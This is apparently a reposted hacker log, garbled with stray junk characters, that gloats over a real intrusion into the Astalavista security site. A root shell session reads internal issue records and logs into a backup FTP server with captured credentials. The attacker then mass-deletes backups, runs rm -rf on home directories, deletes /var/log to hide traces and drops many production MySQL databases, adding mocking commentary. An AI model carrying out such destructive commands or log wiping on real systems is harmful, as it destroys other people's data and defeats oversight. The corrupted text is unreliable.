7 w: }- C1 O, g. P// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…; }* `* u8 I4 [3 N/ L/ m1 t

' A/ B* ]4 f5 ?2 L% |* e& tmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;4 [+ w9 F: a2 L6 E$ \
+——————+———————————————————————————————+6 O+ G$ X: [/ m
| iss_summary      | iss_description                                                                             |
! g+ F1 ^* A* H/ k; T+——————+———————————————————————————————+" w0 D2 w; v/ o" \* b
| Website guidance | Virtual Girl which guides you trought the website.( ~" H0 D3 b, f+ p

- q$ d/ F7 ~* F6 b9 uWe need a girl with who you can ( talk )!!!
( k8 e- c  a5 q! d8 x' k: i- iAlso for the News!
, R0 W. c+ |3 g) ~! ESo my suggestion is a girl who read you the news loud if you like!6 \: T4 w( U* d  n- ]
you can choose between read yourselfe or she read it for you or both!/ X. G  t& [: z0 I% M* E9 x6 K
7 {3 j5 r, z) l- _* V. F, J
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
5 e) B- s  r' `3 z7 ~9 j
. O& x3 h! p. V" w3 S# _Have a look on the example girls!!
& i- \- [- f$ E) j
' r9 x) M" g# o$ @3 s链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
4 d+ ^5 @8 [% M$ k. \" R: ]3 `: \* A
or that3 D" \- E2 q" S5 g

6 ^- c) g/ U, H6 N1 W! ~链接标记[url]http://www.yellostrom.de/[/url]
$ }7 t1 m; D8 b4 R  k* u
! f- c5 u# @. B; W& g- m% U. l* q|3 D% X- ^$ x  @/ }' j: l9 `* h
+——————+———————————————————————————————+* ?5 |0 e! d; N" X) d! i0 g
1 row in set (0.00 sec)
1 r: k: n) i; p0 n# r  J4 ~
: |" P/ b1 w% H* f) p8 u3 E// ha ha.! T0 |; l+ z2 n( n+ r
4 o, g% Y; m; E/ @% t' M& ?
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;6 Y& V. V. @9 z4 A; F* h, L' D
+————————–+———————————————————————————————————–+
' v8 k: ~9 q: [' M" p| iss_summary              | iss_description                                                                                           |" w% k5 E7 O; S; j" G% ^
+————————–+———————————————————————————————————–+0 R3 i# T7 P( @4 P
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
7 U, \+ B) `* a! p- {$ D; X8 I+————————–+———————————————————————————————————–+
) U3 W7 e% P) ^* P( Y9 j8 H1 row in set (0.00 sec)* _, P7 R6 Y4 _8 E

/ z  Z/ v8 ^) j0 I2 i' h, O1 T// LOL.9 _/ X5 t* S- V5 f+ I  \
/ W! v& P  t9 u4 H+ q. Y+ [
mysql> exit
6 ]6 s1 P: b8 J" q. M6 xBye
, p* I2 r) d1 s( L. C& G3 `" C' _/ T; O/ K+ H. V
sh-3.2# ftp 212.254.194.1639 w" t3 n" c" p, k. q
Connected to 212.254.194.163.1 J6 U* @9 \7 `" Z& w
220 BackupCOM_VW FTP server ready.
/ j* `+ I8 U2 A504 AUTH: security mechanism ‘GSSAPI’ not supported.( Y5 o9 k! h. d* y& Q" e3 \* x+ O0 x7 X
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.0 J7 n/ e% |/ t  ^5 F* g
KERBEROS_V4 rejected as an authentication type
- J& N: v+ O. ^6 d6 ~5 uName (212.254.194.163:root): astalavista.com: e) g: x! u, m5 J- S9 T
331 Password required for astalavista.com.
8 {% u' u, y$ o: FPassword:! y; M" [5 o) l, Y4 ~2 M
230 User astalavista.com logged in.
  u: z3 K7 R- E' U: ^4 h/ b: GRemote system type is UNIX.$ C- v8 T# \* \9 `7 |! F4 n
Using binary mode to transfer files." M" _' [) t5 W
ftp> ls -la& }/ I+ F2 l3 M- x2 }4 I
227 Entering Passive Mode (212,254,194,163,2,188)6 A$ @, S0 ~# l: H. K1 y7 w
150 Opening BINARY mode data connection for ‘file list’.
! ?, `/ s4 I8 _3 n5 hdr-x——   1 root users         4096 Jun  4 06:13 astalavista.com4 W( I; t/ ?2 |% ?4 C
226 Transfer complete.4 h+ i, M' E5 J4 C# x: l& X
ftp> cd astalavista.com
/ V+ Q. W. t  }! `& O250 CWD command successful.0 b5 p4 s& m/ v
ftp> ls -la4 D, R" R1 T5 @4 J/ g2 `( ^2 F7 `
227 Entering Passive Mode (212,254,194,163,2,189)
& N. _4 V. W: Q3 x150 Opening BINARY mode data connection for ‘file list’.9 \- x% N: b) X* Y4 h
-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
& H  C0 M" T3 [1 |6 @/ j-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2+ U8 w' K. V6 O+ ^1 U- v/ c) x4 M4 E
-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
% j' y  q! U5 Q8 [-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
% ^; {$ x3 k% t/ m( N-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar
4 M) p+ m7 ^4 s/ ?0 x[snip]+ _* e6 e' K2 q/ ], `
226 Transfer complete.: ^  h( F' {% x0 N3 v' T
ftp> mdelete *+ p' N3 a6 u, @2 g4 a/ i
ftp> ls -la2 K  _* W' E5 X$ T7 R
227 Entering Passive Mode (212,254,194,163,2,193)
( P+ ^* z- c8 L7 H150 Opening BINARY mode data connection for ‘file list’.
0 v7 ~/ n, c+ [( g226 Transfer complete.
! b$ @& p( y% yftp>9 A) z2 A0 r. l8 H

' V8 T+ E% v2 O1 a) z7 {sh-3.2# cd /home9 c, h- ^2 l  g" o" n0 E
sh-3.2# ls -la
( `" D+ T' E6 \  F' z( j! gtotal 120# E% D: l$ @& V2 N
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
4 D- r/ `& Z' a  C" B2 edrwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
; u, {7 U3 R7 Y* C9 \drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin  a& a) e* k. {, L6 A' D
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
8 i  G5 D, l' |+ L5 I-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
9 D8 p. |7 @' g5 Pdrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
* Z3 R; U0 z% ~: V; ydrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup7 [+ {7 m5 X0 f% P& I1 C+ p
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
1 Q1 r0 C2 _, f3 |8 I$ n( idrwx–x–x 10 com     com      4096 Apr 28 12:40 com
" x7 s2 I, e3 Hdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp
& `- w3 d# u: q7 @/ ]drwx——  3 jon     jon      4096 Sep 21  2007 jon
4 l- K3 m. R5 U& ldrwx——  2 root    root    16384 Sep 11  2007 lost+found
" w) M( |* l* N9 P, `6 {  Fdrwxr-xr-x  2 root    root     4096 Sep 14  2007 my& r$ J  I- m% E& B! s
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
# a  J2 {: Q2 f! vdrwx——  2 jon     jon      4096 Sep 15  2007 test. t* z7 B) m. g6 R5 _- ?
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
, x3 Y7 I7 J! p: W. b9 k+ M: x! C' ?% y
sh-3.2# rm -rf backup/, m. i# `, B1 ~$ L% V) G  g
sh-3.2# rm -rf backup.14161/2 L% S- B5 m; w  t  _3 r' [4 j  E
sh-3.2# rm -rf ftp/5 g) L" h7 z& a! s. b8 a; u
sh-3.2# rm -rf jon/
" \# d, b) f2 D' _sh-3.2# rm -rf my/# p1 o* I6 L# f( r0 Q9 V& X% I
sh-3.2# rm -rf mysqldata/
; i) w8 J0 e2 I/ t+ `sh-3.2# rm -rf test/
5 R0 g8 O6 X8 N* @sh-3.2# rm -rf tmp/
- o3 K5 Q) Q9 K4 ]( A3 [/ K4 Psh-3.2# cd ~7 w4 N( [' A4 u
sh-3.2# rm -rf *7 C1 `0 T4 `: W3 I* q9 M; M# D% Z  }
sh-3.2# rm -rf /var/log/( k" [' K# ^, U; n( _6 t0 f6 H
rm: cannot remove directory `/var/log//proftpd’: Directory not empty; Z+ i4 u* N* L' ^0 n# E$ g7 _) i
sh-3.2# rm -rf /home/*! F% `; G, e- h7 `
sh-3.2# mysql
0 `6 w; F3 Y. H  c& O; jWelcome to the MySQL monitor.  Commands end with ; or \g.
/ R. z" u* p3 p" n( ?Your MySQL connection id is 407156
3 c$ E4 a% v& |/ t, X1 ^Server version: 5.0.45-community-log MySQL Community Edition (GPL)
6 J" h. N& i- l9 D
$ a, Z3 r& i( H$ J( J. cType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* ^- Y# y) o$ \1 H5 g; C/ r

2 O* o' Q# n8 E' v% `% u) t+ b" umysql> show databases;
" s* f4 G1 k: F/ L* B+———————–+
6 Q2 W" z; P& n7 S5 s" d| Database              |
4 q- V. ?3 |: I# J/ a( G+———————–+7 ?: n7 Z3 o6 ~( V2 g, m
| information_schema    |! t% v. s$ j# d! Y
| astanet_ads           |
7 K$ a. y1 P) [! ~| astanet_mailing_lists |6 b2 K/ E1 C; h+ \/ h, B3 I
| astanet_mediawiki     |9 E6 |7 c; t, }7 L8 Z/ z! u  S1 f' |
| astanet_membersystem  |& z2 A8 H/ ]% u4 u2 d
| com_contrexx          |5 [; Y, w: V) y7 R
| com_contrexx2         |2 |, ^0 _) N9 Q) w& J
| com_contrexx2_live    |
: ~9 ?% S2 ~3 g* P| da_roundcube          |
" k+ B9 V, m4 |, v$ ~9 B5 z| dolphin               |! `0 x9 R1 C5 V5 s
| ideapool              |* C& }( A+ u& C' G5 a' H$ Y! [
| mysql                 |5 ~  F! z4 j% Y/ R
| test                  |
6 Q3 t1 c" s4 Z+ f| yourmaster            |  m' j$ H' D- ~; r# L& k# c
+———————–+
7 X2 }/ K3 _; k  H. \  E, p! a14 rows in set (0.03 sec)2 d2 T. m* Q* I' L
5 h: h8 I1 _% ~
mysql> drop database astanet_membersystem;; [' ?, m. `$ s+ D
droQuery OK, 46 rows affected (0.81 sec)
; X6 z; E6 |5 O! x8 W
; `2 s/ C+ Q) O, a+ t! b' \) qmysql> drop database com_contrexx;
( @, G# ?9 Q7 l- W* F6 U) h" b9 z7 kQuery OK, 211 rows affected (2.72 sec)4 i- v7 Z/ @* P" V, h& J
% }; _9 i: c( J
mysql> drop database com_contrexx2;- D8 [) H4 o$ T! g2 T, l
Query OK, 237 rows affected (2.23 sec)
+ U  l% J7 F" v
( {& s0 }5 h1 W- omysql> drop database com_contrexx2_live;7 J1 }1 x5 `) C! e9 K
Query OK, 227 rows affected (7.63 sec)" R& y( _7 z' b* Y
5 o1 D6 c0 C# c
mysql> drop database ideapool;
! B& e8 d9 g9 B: W3 L8 ]1 D! SQuery OK, 69 rows affected (0.19 sec)$ b! u" `4 O; i, E. c/ f) T
& U4 r+ q8 c) \1 i2 ?0 m4 C
mysql> drop database yourmaster;# U' ?8 l' d3 ?% w  \/ I
Query OK, 158 rows affected (0.55 sec)
( J$ |% V' T# {
5 e+ ^' a% S  {$ ymysql> drop database astanet_ads;
: \5 ^0 p4 A, YQuery OK, 9 rows affected (0.11 sec)
4 c( n# _; R! a- k& t, _4 V2 `
3 `/ r; p5 f# i3 _mysql> drop database astanet_mailing_lists;
' V0 R' a. ]% n8 ZQuery OK, 24 rows affected (1.47 sec)8 N* S3 M% N0 `" O

) {% R0 g2 p) P0 I8 F- Jmysql> drop database astanet_mediawiki;
& Q. w& n% a4 z7 @% ?4 HQuery OK, 31 rows affected (0.51 sec)3 j9 ?; ]* s4 H- z( u$ c2 Z+ a3 N

% D1 B5 S; ?  U! Q$ X1 f  d' ]mysql> show databases;9 o+ |  _  y! ?" \
+——————–+
( i0 A; V- m( i* v& A% t| Database           |
$ ]% S; E. ^* B; A" X6 }+——————–+8 K9 ?6 x; S8 R' K8 g, w: p2 ~
| information_schema |3 k. Q7 q& \( X4 E/ ~1 u# E
| da_roundcube       |
% d4 E. g. X+ P- G  w0 u0 W% F8 [6 q| dolphin            |
8 J+ o1 @& O+ n| mysql              |) m! \! S* i6 I' [0 ^0 ]& v
| test               |& d; i& o7 g6 T! |6 |9 c
+——————–+$ g& f5 K  S- \% q& S1 a$ ^: ^# L) p
5 rows in set (0.00 sec)6 r. E$ J& S; U

( H3 q$ h& \3 Q1 s+ E; P9 W" VWhat a journey! We’re not sure exactly why the “Terminator” had any influence on3 k/ J2 a$ |* e+ L
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
& ]( s$ ^  Z: o+ l9 \" {wrong to say this pack of morons *wont be back*.
) T9 s  Z6 E, j' J! G




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2